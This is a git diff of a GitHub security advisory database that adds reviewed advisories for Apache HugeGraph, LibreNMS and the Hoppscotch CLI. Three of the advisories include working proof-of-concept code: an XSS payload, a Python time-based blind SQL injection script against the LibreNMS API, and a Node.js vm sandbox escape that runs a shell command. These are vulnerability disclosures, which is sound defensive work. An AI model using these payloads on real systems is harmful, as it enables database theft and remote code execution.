diff --git a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json index 449e87c9f33..481334b3e91 100644 --- a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json +++ b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h58v-c6rf-g9f7", - "modified": "2023-04-25T16:32:27Z", + "modified": "2024-04-22T18:36:58Z", "published": "2021-07-01T17:00:04Z", "aliases": [ "CVE-2021-35210" diff --git a/advisories/github-reviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json b/advisories/github-reviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json new file mode 100644 index 00000000000..917b9c681be --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29rc-vq7f-x335", + "modified": "2024-04-22T18:37:52Z", + "published": "2024-04-22T15:30:41Z", + "aliases": [ + "CVE-2024-27348" + ], + "summary": "Apache HugeGraph-Server: Command execution in gremlin", + "details": "RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.hugegraph:hugegraph-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.hugegraph:hugegraph-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27348" + }, + { + "type": "WEB", + "url": "https://github.com/apache/incubator-hugegraph/commit/713d88d1fd9953c3c3e3f130389501910ba40e1d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/incubator-hugegraph" + }, + { + "type": "WEB", + "url": "https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:52Z", + "nvd_published_at": "2024-04-22T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json b/advisories/github-reviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json new file mode 100644 index 00000000000..2eac0265337 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mgp-p75r-vhjm", + "modified": "2024-04-22T18:37:58Z", + "published": "2024-04-22T15:30:41Z", + "aliases": [ + "CVE-2024-27349" + ], + "summary": "Apache HugeGraph-Server: Bypass whitelist in Auth mode", + "details": "Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.hugegraph:hugegraph-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27349" + }, + { + "type": "WEB", + "url": "https://github.com/apache/incubator-hugegraph/commit/713d88d1fd9953c3c3e3f130389501910ba40e1d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/incubator-hugegraph" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/dz9n9lndqfsf64t72o73r7sttrc6ocsd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:58Z", + "nvd_published_at": "2024-04-22T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-72m9-7c8x-pmmw/GHSA-72m9-7c8x-pmmw.json b/advisories/github-reviewed/2024/04/GHSA-72m9-7c8x-pmmw/GHSA-72m9-7c8x-pmmw.json new file mode 100644 index 00000000000..0fbc1471a3b --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-72m9-7c8x-pmmw/GHSA-72m9-7c8x-pmmw.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-72m9-7c8x-pmmw", + "modified": "2024-04-22T18:37:27Z", + "published": "2024-04-22T18:37:27Z", + "aliases": [ + "CVE-2024-32479" + ], + "summary": "LibreNMS uses Improper Sanitization on Service template name leads to Stored XSS", + "details": "### Summary\nThere is improper sanitization on Service template name which is reflecting in delete button onclick event. This value can be modified and crafted as any other javascript code.\n\n \n### Vulnerable Code\nhttps://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23\n\nAbove is vulnerable code line which needs to be properly sanitized \n\n### PoC\n1. Go to /services/templates\n2. Enter name as `testing', '14', 'http://172.105.62.194:8000/services/templates/14');alert(1);//`\n3. Submit it and try to delete it, you will see popup\n\nIf you inspect element on delete button, you will notice this:-\n\"Screenshot\n\n\n### Impact\nCross site scripting can lead to cookie stealing or an attacker can execute any other feature using this feature.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "librenms/librenms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/security/advisories/GHSA-72m9-7c8x-pmmw" + }, + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/commit/19344f0584d4d6d4526fdf331adc60530e3f685b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/librenms/librenms" + }, + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:27Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json b/advisories/github-reviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json new file mode 100644 index 00000000000..2d04041ab2f --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77x4-55q7-4vmj", + "modified": "2024-04-22T18:37:45Z", + "published": "2024-04-22T15:30:41Z", + "aliases": [ + "CVE-2024-27347" + ], + "summary": "Apache HugeGraph-Hubble: SSRF in Hubble connection page", + "details": "Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble. This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.hugegraph:hugegraph-hubble" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27347" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/incubator-hugegraph-toolchain" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/z0v71148slfkw60hsp35pl7ddjyvg01l" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:45Z", + "nvd_published_at": "2024-04-22T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-cwx6-cx7x-4q34/GHSA-cwx6-cx7x-4q34.json b/advisories/github-reviewed/2024/04/GHSA-cwx6-cx7x-4q34/GHSA-cwx6-cx7x-4q34.json new file mode 100644 index 00000000000..f348459c88d --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-cwx6-cx7x-4q34/GHSA-cwx6-cx7x-4q34.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwx6-cx7x-4q34", + "modified": "2024-04-22T18:37:21Z", + "published": "2024-04-22T18:37:21Z", + "aliases": [ + "CVE-2024-32461" + ], + "summary": "LibreNMS vulnerable to SQL injection time-based leads to database extraction", + "details": "### Summary\nSQL injection vulnerability in POST /search/search=packages in LibreNMS 24.3.0 allows a user with global read privileges to execute SQL commands via the package parameter. \n\n### Details\nThere is a lack of hygiene of data coming from the user in line 83 of the file librenms/includes/html/pages/search/packages.inc.php\n![vulnerability](https://github.com/librenms/librenms/assets/58785171/3ad76f72-e62b-475e-84a0-4024e751f44c)\n\n### PoC\nhttps://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6\n\n### Impact\nWith this vulnerability, we can exploit a SQL injection time based vulnerability to extract all data from the database, such as administrator credentials\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "librenms/librenms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/security/advisories/GHSA-cwx6-cx7x-4q34" + }, + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/commit/d29201fce134347f891102699fbde7070debee33" + }, + { + "type": "WEB", + "url": "https://doc.clickup.com/9013166444/p/h/8ckm0bc-53/16811991bb5fff6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/librenms/librenms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:21Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-jh57-j3vq-h438/GHSA-jh57-j3vq-h438.json b/advisories/github-reviewed/2024/04/GHSA-jh57-j3vq-h438/GHSA-jh57-j3vq-h438.json new file mode 100644 index 00000000000..b762e7e9931 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-jh57-j3vq-h438/GHSA-jh57-j3vq-h438.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jh57-j3vq-h438", + "modified": "2024-04-22T18:37:35Z", + "published": "2024-04-22T18:37:35Z", + "aliases": [ + "CVE-2024-32480" + ], + "summary": "LibreNMS vulnerable to a Time-Based Blind SQL injection leads to database extraction", + "details": "### Summary\nGet a valid API token, make sure you can access api functions, then replace string on my PoC code, Test on offical OVA image, it's a old version 23.9.1, but this vulerable is also exists on latest version 24.2.0\n\n### Details\nin file `api_functions.php`, line 307 for function list_devices\n\n```php\n$order = $request->get('order');\n $type = $request->get('type');\n $query = $request->get('query');\n $param = [];\n\n if (empty($order)) {\n $order = 'hostname';\n }\n\n if (stristr($order, ' desc') === false && stristr($order, ' asc') === false) {\n $order = 'd.`' . $order . '` ASC';\n }\n /* ... */\n $devices = [];\n $dev_query = \"SELECT $select FROM `devices` AS d $join WHERE $sql GROUP BY d.`hostname` ORDER BY $order\";\n foreach (dbFetchRows($dev_query, $param) as $device) {\n```\nThe \"order\" parameter is obtained from $request. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability.\n\n### PoC\nFor example. this PoC is get current db user\n```python\nimport string\nimport requests\n\nheaders = {\n\t'X-Auth-Token': 'token_string'\n}\nreq = requests.Session()\npayloads = '_-@.,' + string.digits + string.ascii_letters\nurl = 'http://host/api/v0/devices?order=device_id` and if(ascii(substr(user(),%d,1))=%d,sleep(5),1) and d.`device_id'\nresult = 'user: '\nfor i in range(10):\n\tfor payload in payloads:\n\t\ttry:\n\t\t\treq.get(url % (i+1, ord(payload)), headers=headers, timeout=3)\n\t\texcept requests.exceptions.ReadTimeout as ex:\n\t\t\tresult += payload\n\t\t\tprint(result),\n\t\texcept Exception as e:\n\t\t\tpass\n```\n![QQ截图20240306181404](https://github.com/librenms/librenms/assets/11938870/017cc413-ce1e-45a2-b0f1-a0ae83bbbeee)\n\n### Impact\nAttacker can extract whole database", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "librenms/librenms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/security/advisories/GHSA-jh57-j3vq-h438" + }, + { + "type": "WEB", + "url": "https://github.com/librenms/librenms/commit/83fe4b10c440d69a47fe2f8616e290ba2bd3a27c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/librenms/librenms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:37:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/04/GHSA-qmmm-73r2-f8xr/GHSA-qmmm-73r2-f8xr.json b/advisories/github-reviewed/2024/04/GHSA-qmmm-73r2-f8xr/GHSA-qmmm-73r2-f8xr.json new file mode 100644 index 00000000000..399c6462831 --- /dev/null +++ b/advisories/github-reviewed/2024/04/GHSA-qmmm-73r2-f8xr/GHSA-qmmm-73r2-f8xr.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmmm-73r2-f8xr", + "modified": "2024-04-22T18:38:11Z", + "published": "2024-04-22T18:38:11Z", + "aliases": [ + + ], + "summary": "@hoppscotch/cli affected by Sandbox Escape in @hoppscotch/js-sandbox leads to RCE", + "details": "### Observations\n\nThe Hoppscotch desktop app takes multiple precautions to be secure against arbitrary JavaScript and system command execution. It does not render user-controlled HTML or Markdown, uses Tauri instead of Electron, and sandboxes pre-request scripts with a simple yet secure implementation using web workers.\n\nUnfortunately, web workers are not available in a pure Node.js application like Hoppscotch CLI. That is why the [@hoppscotch/js-sandbox](https://github.com/hoppscotch/hoppscotch/tree/main/packages/hoppscotch-js-sandbox) package also provides a Javascript sandbox that uses the Node.js `vm` module. However, the `vm` module is not safe for sandboxing untrusted Javascript code, as stated [in the documentation](https://nodejs.org/api/vm.html#vm-executing-javascript). This is because [code inside the vm context can break out](https://thegoodhacker.com/posts/the-unsecure-node-vm-module/) if it can get a hold of any reference to an object created outside of the vm.\n\nIn the case of @hoppscotch/js-sandbox, multiple references to external objects are passed into the vm context to allow pre-request scripts interactions with environment variables and more. But this also allows the pre-request script to escape the sandbox.\n[packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts](https://github.com/hoppscotch/hoppscotch/blob/faab1d20fde9a6be660db40fc73dcf28f9038008/packages/hoppscotch-js-sandbox/src/pre-request/node-vm/index.ts#L23-L31)\n```js\nconst { pw, updatedEnvs } = getPreRequestScriptMethods(envs)\n\n// Expose pw to the context\ncontext.pw = pw\ncontext.atob = atob\ncontext.btoa = btoa\n\n// Run the pre-request script in the provided context\nrunInContext(preRequestScript, context)\n```\n\n### Exploitation\n\nAn attacker can use the exposed `pw` object reference to escape the sandbox and execute arbitrary system commands using the `child_process` Node.js module. This PoC pre-request script executes the `id > /tmp/pwnd` system command as soon as a request is sent.\n```js\noutside = pw.constructor.constructor('return this')()\noutside.process.mainModule.require('child_process').execSync('id > /tmp/pwnd')\n```\nAn attacker who wants to run arbitrary code on the machine of a victim can create a Hoppscotch collection containing a request with a malicious pre-request script and share it with a victim, using the JSON export feature. The victim then has to run the collection with the Hoppscotch CLI. Then the malicious pre-request script executes.\n\n### Impact\n\nThis attack gives an attacker arbitrary command execution on the machine of a victim Hoppscotch CLI user. For the attack to succeed, an attacker has to lure the victim into downloading a malicious Hoppscotch collection and running it with the Hoppscotch CLI.\n\nThis issue does not impact Hoppscotch Web or Desktop, as they use the safe web worker sandboxing approach.\n\n### Recommendations\n\nHoppscotch CLI and other tools that rely on @hoppscotch/js-sandbox but don't have access to a browser cannot use the web worker sandbox. For these, you can look into other safe JavaScript sandboxing libraries. We think that [isolated-vm](https://github.com/laverdet/isolated-vm) looks promising. We discourage the use of [vm2](https://github.com/patriksimek/vm2), which is deprecated because it has arbitrary bypasses. Alternatively, you can introduce an `--enable-scripting` flag for the CLI and disable scripting by default. Or you can change the threat model and educate users that they should not run untrusted collections as it can lead to RCE.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@hoppscotch/cli" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.8.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-qmmm-73r2-f8xr" + }, + { + "type": "WEB", + "url": "https://github.com/hoppscotch/hoppscotch/commit/22c6eabd133195d22874250a5ae40cb26b851b01" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hoppscotch/hoppscotch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-04-22T18:38:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json b/advisories/unreviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json deleted file mode 100644 index 4c4df1f4217..00000000000 --- a/advisories/unreviewed/2024/04/GHSA-29rc-vq7f-x335/GHSA-29rc-vq7f-x335.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-29rc-vq7f-x335", - "modified": "2024-04-22T15:30:41Z", - "published": "2024-04-22T15:30:41Z", - "aliases": [ - "CVE-2024-27348" - ], - "details": "RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27348" - }, - { - "type": "WEB", - "url": "https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-04-22T14:15:07Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json b/advisories/unreviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json deleted file mode 100644 index 2a39e4f9d56..00000000000 --- a/advisories/unreviewed/2024/04/GHSA-6mgp-p75r-vhjm/GHSA-6mgp-p75r-vhjm.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mgp-p75r-vhjm", - "modified": "2024-04-22T15:30:41Z", - "published": "2024-04-22T15:30:41Z", - "aliases": [ - "CVE-2024-27349" - ], - "details": "Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27349" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/dz9n9lndqfsf64t72o73r7sttrc6ocsd" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-290" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-04-22T14:15:07Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json b/advisories/unreviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json deleted file mode 100644 index 597baff16a8..00000000000 --- a/advisories/unreviewed/2024/04/GHSA-77x4-55q7-4vmj/GHSA-77x4-55q7-4vmj.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-77x4-55q7-4vmj", - "modified": "2024-04-22T15:30:41Z", - "published": "2024-04-22T15:30:41Z", - "aliases": [ - "CVE-2024-27347" - ], - "details": "Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble.This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0.\n\nUsers are recommended to upgrade to version 1.3.0, which fixes the issue.\n\n", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27347" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/z0v71148slfkw60hsp35pl7ddjyvg01l" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-04-22T14:15:07Z" - } -} \ No newline at end of file